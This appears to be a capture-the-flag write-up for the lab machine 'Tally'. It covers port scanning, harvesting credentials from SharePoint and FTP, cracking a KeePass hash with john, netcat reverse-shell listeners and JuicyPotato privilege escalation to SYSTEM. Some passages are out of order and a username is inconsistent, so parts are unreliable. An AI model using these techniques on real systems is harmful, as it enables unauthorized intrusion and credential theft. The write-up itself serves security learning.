As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Nov 7 17:21:56 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.054s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-http
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Mon Nov 7 17:22:10 2022 -- 1 IP address (1 host up) scanned in 14.24 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Nov 7 17:24:14 2022 as: nmap -sCV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-11-07T16:18:15
|_Not valid after: 2052-11-07T16:18:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
15567/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-11-07T16:25:23
|_ start_date: 2022-11-07T16:17:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 7 17:25:33 2022 -- 1 IP address (1 host up) scanned in 79.59 seconds
The website shows a SharePoint application.
Inside the Documents folder there is one file called ftp-details.docx.
Let's get the content of the document with the docx2text tool.
docx2txt ftp-details.docx
cat ftp-details.txt
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
On the other hand, the SitePages folder contains another item.
http://10.10.10.59/SitePages/Forms/AllPages.aspx
The page contains a message with an FTP username called ftp_user.
http://10.10.10.59/SitePages/FinanceTeam.aspx
Exploitation
Now, we have valid credentials for the FTP server.
ftp ftp_user@10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50488|)
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
As it looks like the content of the FTP server is big, let's mount it to a directory called ftp with curlftpfs.
Let's copy that filw to our current directory, get it's hash, and try to break it with john.
cp ftp/User/Tim/Files/tim.kdbx .
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo (tim)
1g 0:00:00:48 DONE (2022-11-07 20:04) 0.02060g/s 508.7p/s 508.7c/s 508.7C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have the password, let's open the passwords database with keepassxc.
keepassxc tim.kdbx
There is one entry called TALLY ACCT share with the username Finance and the password Acc0unting.
These crednetials are valid for the SMB server.
cme smb 10.10.10.59 -u "Finance" -p "Acc0unting
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0unting
By listing the shares, we'll see that we can read the ACCT share.
Now we could log in to the MS SQL server on port 1433 with the mssqlclient tool from impacket.
impacket-mssqlclient sa@10.10.10.59
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: GWE3V65#6KFH93@4GWTG2G
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commands
We could try to run commands with xp_cmdshell, but it is disabled.
xp_cmdshell whoami
[-] ERROR(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.59 50694
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> type \users\sarah\desktop\user.txt
26bf3a939acfe12a9088270ea0fe2d21
Privilege Escalation
Let's start by seeing what privileges the user tolis has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
JuicyPotato is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that SeImpersonate or SeAssignPrimaryToken are enabled.
To escalate privileges, we'll have to transfer JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the tolis user.
Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.
nc -lvnp 5555
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.59 50731
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
7850cfbb5ab1ddefb5406ff662fecec7
Doing some research on the internet, I found a pentest on SharePoint which shows directories such as /_layouts/viewlsts.aspx.
Time to get a shell. First, download the file from Nishang, and add the following function at the end of the script. I will rename the file to rv.ps1.
